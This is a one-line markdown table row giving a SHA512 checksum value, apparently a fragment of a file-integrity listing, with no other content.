| SHA512 | 56f2c8d57d9199cae37267ecbebe477194fbef5697456686a3043ecb8d36eb21718dedbd8d5a42902949c2155125ca5c168fd8fa2cb8ffac2288e0073ae385aa |